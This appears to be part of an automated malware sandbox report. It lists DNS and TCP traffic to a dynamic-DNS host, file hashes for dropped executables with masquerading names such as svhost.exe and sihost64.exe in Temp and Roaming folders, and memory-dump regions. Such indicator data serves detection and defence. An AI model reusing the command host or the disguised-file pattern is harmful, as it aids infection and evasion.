| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 172.67.189.225:3359 | | tcp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\lear.exe
| MD5 | 0bff36b53d94dbeba2ca37da0ee15631 |
| SHA1 | 4536eb13dd54de6b25d0de95272efd65eb70234c |
| SHA256 | 841b1aac0d31d294a7ee3a77946947e24ef8eba639c67b9004337b0689f28ac9 |
| SHA512 | 0fa04ec542b27d13fe9e45a7bca2094ad628c8e80a5466ec264fd85b54a56899dc23bd6898879af4919609b336e8b75965ba743326149959fdeec27a0fe4f668 |
C:\Users\Admin\AppData\Local\Temp\svhost.exe
| MD5 | 696f2e0facba8c9bc7e2269986bada95 |
| SHA1 | aaa3ce178ba47c0e370c3ca40b99654cf61d99dd |
| SHA256 | de781ab98b48f1d32a0eac30ab8e9f3d0de9d532db7720fd0a803f227abb039a |
| SHA512 | afa581a6e90aac8b6dc99fa15bfcf078d83af623bee1d79ed9f7578160d6651fa80f2deaf3b43d9a5082442cb82b9e5fd2c3d18d51d5f7cd52182115511baaeb |
C:\Users\Admin\AppData\Local\Temp\lear.exe
| MD5 | 95f767c722a38a1cefe083d99422a58d |
| SHA1 | 16eb39ae6079acbc7a9bbe88eb3ebbe85ade9cf8 |
| SHA256 | 157f6767a523fbbd1c304aa1b855c1e843b49d227cc4c7df702262b11c75bda1 |
| SHA512 | a56fb76657217691632f79295d85d845df35b45b0302727e2724413c508757bcb983ea6b87be5629368980929ae86035483c28c4c8266d545ecadfcc4d1a5944 |
memory/3200-71-0x00007FFE4BE60000-0x00007FFE4C921000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\lear.exe
| MD5 | 19b6f0bec5362333d1d87f4679208d72 |
| SHA1 | a4f6bdec95a45bd30c874c2a44a3222b948f966f |
| SHA256 | a0e550e73ffaba9fc8a24d91a14d17ed4402ac30dc90e5ac42625115d50cabdb |
| SHA512 | 18d3f8ec0269c06ee1f48ead949e852b726b7813cf5d4fa61497b0a01dae2f9b661f5ce5eb7122f11e346397f4fa92b2977ffe2542f92bb2e8d60f0772667b6f |
memory/1956-73-0x0000000074600000-0x0000000074BB1000-memory.dmp
memory/1956-74-0x0000000074600000-0x0000000074BB1000-memory.dmp
memory/1956-75-0x0000000001660000-0x0000000001670000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
| MD5 | 9ddac033ac79900f5ad182c557c328d1 |
| SHA1 | e7178202799f83f318a1083fb10910278ba1efe9 |
| SHA256 | 316af643b17f7f6f9a74775791d5603a2eba9b35fa758dda2f4d3b884e3839bd |
| SHA512 | eee3d87857d7bc6f45a88bf49aa05ec0fedd48f32ee7fae04f2e840a24e635b4340275093253cf1639194dc0277c5e0e9e5c06deb7178127bff6d1dcc5db53be |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
| MD5 | 43d590f88270ff8963d47a4a5161cd2c |
| SHA1 | 2ba74ac4fec486373c0ebe94bc75223ab2600490 |
| SHA256 | db25ed27bfdfde3b88b4a7483e15bdecc587f694e8dc2c1ca91325e1d5b4453a |
| SHA512 | 00a156c09c6d7e5dc25f89aecd4051a3d555aec268d313d328ea12ebb30a30a7d2d80a152e8b06bd477fe9fd01ee16ecbef62edf249b03fc59f0fd809b9934a0 |
memory/1020-90-0x00007FF624DC0000-0x00007FF6253B4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
| MD5 | 40640840746d6a6c57a2d75527df8991 |
| SHA1 | 13deceda20b587158231fa7613b78a77172f86ce |
| SHA256 | f05e99298ab69dd46226761dacb6933f03bbcb95f8bfb0238a578af15e187039 |
| SHA512 | 2e06df6a763cbef37f0bdabe15cae69ad90d5e0614617f875f249837241b8838a0ea0dd1a2a04d1b5ef5c522167811ee542da57d3aa09b2e5a07c9c223c041f3 |
memory/1020-92-0x00007FFE69970000-0x00007FFE69980000-memory.dmp
memory/1020-93-0x00007FF624DC0000-0x00007FF6253B4000-memory.dmp
memory/1020-95-0x00007FF624DC0000-0x00007FF6253B4000-memory.dmp
memory/1020-94-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/1020-96-0x00000000037C0000-0x00000000037CA000-memory.dmp
memory/1020-98-0x0000000003C50000-0x0000000003C60000-memory.dmp
memory/1020-97-0x0000000003C30000-0x0000000003C42000-memory.dmp
memory/4648-112-0x00007FF6FEF40000-0x00007FF6FF534000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\services32.exe
| MD5 | 25c8ed402887392f040d5df468f72c28 |
| SHA1 | d0ce1a4bc8146fd69b96253744160d684b5da285 |
| SHA256 | 5419970b47d0b6e6550db7feaa099928b2f903f4fdffa10a0ef5ffbf92e61576 |
| SHA512 | 865fc814f9314bec937773b0172a496b8c27e1fdbfc14418ae73d199eff4d89dad4d1d3615247b356b58bf440003f0df8bcce32b32f7032c0dd20cd93f4e17a4 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
| MD5 | 611f87f2772d9497a398a841060635b9 |
| SHA1 | 87f09e34188c36929a8711b007ffa985d31c7191 |
| SHA256 | 1cfe9df671ad4323ec6713fb0838592e2de707e1dadd93be8fede2addf541a3e |
| SHA512 | d2fd1ea8862690ee0458d8af38470547bb6bc38916a767f150ba4089de8c3776ebf9d0e4e5be35fb75c2af4e68528042cd975cf7541db881379394f07ca3e4b2 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
| MD5 | 9c648eeade4c8b324585f38247f40740 |
| SHA1 | f5c348717d3a76a370048c5a5195a303f0daaa07 |
| SHA256 | 46f961a91e90790ca245e819a60faf357aa8af518a05d7c22053032d67360f83 |
| SHA512 | 3bcd1e06b8e4616d582bd1f0211baaf6fc7a3028815ddbb7bc3ec262d5918826139758c3a355b1a044e0b6070db1fe360718ed82a9dbf9dcc46dfb34850112b4 |
memory/4912-126-0x00007FF67BDE0000-0x00007FF67C3D6000-memory.dmp
memory/4648-129-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/4648-130-0x00007FFE69970000-0x00007FFE69980000-memory.dmp
memory/4912-134-0x00007FFE69970000-0x00007FFE69980000-memory.dmp
memory/4912-135-0x00007FF67BDE0000-0x00007FF67C3D6000-memory.dmp
memory/4912-136-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/1956-133-0x0000000074600000-0x0000000074BB1000-memory.dmp
memory/4912-132-0x00007FF67BDE0000-0x00007FF67C3D6000-memory.dmp
memory/4648-128-0x00007FF6FEF40000-0x00007FF6FF534000-memory.dmp
memory/4648-127-0x00007FF6FEF40000-0x00007FF6FF534000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
| MD5 | 50075fb9b3b6faae5c0184b3e69a891a |
| SHA1 | f0fd43ea6936473d6a39ee6edfb77c5365465ec5 |
| SHA256 | c64a0c0c1a706706a770e38716e14d340d469f26fbf00534545ef59c4a88ffa2 |
| SHA512 | 6e67ba375a6af58d0c86750fb165130e06235fc5c895ae9bbcf4a8e6b08717af1fad74624ba38ae5f3bccd67453bc6cbe82dcfba018d63d3f0b10b570a844b31 |
memory/1020-114-0x00007FF624DC0000-0x00007FF6253B4000-memory.dmp
memory/1020-113-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\services32.exe
| MD5 | ce128f070c0ee7cbd879ca932f6635b1 |
| SHA1 | 5cd7502bfaf0461b6c71f1e58639435ca9838eae |
| SHA256 | f45f3f008a7903e2b96e0d3c216d0dad3705ffe7a5f5cba4c2014e9c9363b3e2 |
| SHA512 | d0c68081d090de4ed1526e98236ebfa3064d9d64b3c110f69a096448409e1522f60ddeac3eff575a831568862a3e3178016c47ab1eb6265fe73b8b7183a8349a |
memory/4648-137-0x0000000004590000-0x00000000045A0000-memory.dmp
memory/3204-151-0x00000000003A0000-0x00000000003A6000-memory.dmp
memory/1956-152-0x0000000001660000-0x0000000001670000-memory.dmp
memory/4912-155-0x0000000003E80000-0x0000000003E90000-memory.dmp
memory/3204-156-0x000000001BE40000-0x000000001BE50000-memory.dmp
memory/3204-154-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/4912-153-0x0000000003410000-0x000000000341E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
| MD5 | 7f13e2b226baf92c8c7aa34606a33043 |
| SHA1 | 957594155513bcb9adf119fbd683d6222c97b6f7 |
| SHA256 | 82daa75486edff63daa1eb62220e8aaeea23691151ba98f9f3b8b87f51428e3d |
| SHA512 | a164fc7ecdd842fcedea61025fd8f9abe7c9efa06d08493be2413a052fa91e9c1818bbf006475b3f740174a0c7e6e474ee7f5fa2b703b4f164a8849d4dcc02a1 |
memory/3492-169-0x0000000001430000-0x0000000001440000-memory.dmp
memory/3492-168-0x0000000074600000-0x0000000074BB1000-memory.dmp
memory/1956-167-0x0000000074600000-0x0000000074BB1000-memory.dmp
memory/4648-173-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/4648-174-0x00007FF6FEF40000-0x00007FF6FF534000-memory.dmp
memory/2424-186-0x00007FF70E590000-0x00007FF70EB86000-memory.dmp
memory/4912-188-0x00007FF67BDE0000-0x00007FF67C3D6000-memory.dmp
memory/4912-190-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/2424-194-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/2424-193-0x00007FF70E590000-0x00007FF70EB86000-memory.dmp
memory/2424-192-0x00007FFE69970000-0x00007FFE69980000-memory.dmp
memory/2424-191-0x00007FF70E590000-0x00007FF70EB86000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\services64.exe
| MD5 | e1600c76646028abf588db4acbf5d6d8 |
| SHA1 | 33968a07ed3ba13704f723cf42f06d289a0bfdea |
| SHA256 | 87c0c43b47a5a17ae3df59343e8f2c12c48c2b30ef2c92c0a4d63176353533d2 |
| SHA512 | 64fe3c44c494eb5a1ba400a386d0426dedf2e6df86ae8a819354e7b57633940e693489e0ef8fea49c39d6ef060b8a32884a3dc3205fafc208e1bd19e91e3154f |
C:\Users\Admin\AppData\Local\Temp\services64.exe
| MD5 | 2bbec033125ea50257184b2656416fd4 |
| SHA1 | f6cfe41ea675edfd614c7d5809736540ebf5fff2 |
| SHA256 | 56b86287dea61cc557b726bc56024096ad21eb5821782933f35e78688a2d5109 |
| SHA512 | a048b9c9056ed7a1851153ae15db7ee5ce76d66b9e3c358d9641d3470eccfc0ef65322be0b49bfb34424b3d9f60dd994cc056f13d67069caca1336d06ca53a00 |
memory/2424-195-0x000000001D250000-0x000000001D260000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 16379e3af6a104ba50f80465c44297b3 |
| SHA1 | 23fa672955f7519aa8ab000977560fa952069052 |
| SHA256 | a37d2858b1c7aa02fc4ff57dd4c0f6822fa280c3fae16ca0d79d4df51db1ceae |
| SHA512 | 97a19c76e28214e5cff3bc0164edbb5f52f627a414a2e9008033b398549641d434aad8f97095399c994f7dfb372eb72bafbf706a31877cc2bb7dabb229d0db59 |
memory/4836-210-0x0000000000640000-0x0000000000646000-memory.dmp
memory/4836-211-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/4836-212-0x00000000032A0000-0x00000000032B0000-memory.dmp
memory/4072-216-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2424-220-0x00007FF70E590000-0x00007FF70EB86000-memory.dmp
memory/2424-222-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/4072-221-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4072-224-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4072-225-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4072-227-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4072-226-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4072-223-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4072-219-0x0000000001F20000-0x0000000001F40000-memory.dmp
memory/4072-218-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4072-214-0x0000000140000000-0x0000000140786000-memory.dmp
memory/3204-229-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/3204-230-0x000000001BE40000-0x000000001BE50000-memory.dmp
memory/3492-232-0x0000000001430000-0x0000000001440000-memory.dmp
memory/3492-231-0x0000000074600000-0x0000000074BB1000-memory.dmp
memory/4836-233-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/4836-234-0x00000000032A0000-0x00000000032B0000-memory.dmp
memory/4072-235-0x0000000140000000-0x0000000140786000-memory.dmp